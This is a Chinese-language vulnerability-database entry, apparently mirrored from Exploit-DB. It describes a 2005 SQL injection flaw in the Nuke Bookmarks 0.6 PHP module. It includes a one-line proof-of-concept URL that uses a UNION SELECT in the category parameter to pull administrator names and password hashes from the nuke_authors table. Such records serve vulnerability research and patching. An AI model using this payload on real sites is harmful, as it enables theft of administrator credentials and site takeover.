Nuke BookMarks 0.6 - 'Marks.php' SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054975 漏洞类型
发布时间 2005-03-26 更新时间 2005-03-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25284
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/12908/info

Nuke Bookmarks is prone to an SQL injection vulnerability.

This vulnerability could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks. 

http://www.nukesite.com/modules.php?name=Bookmarks&file=marks&catname=1&category=-1/**/union/**/select%200,aid,0,pwd,0,0%20from%20nuke_authors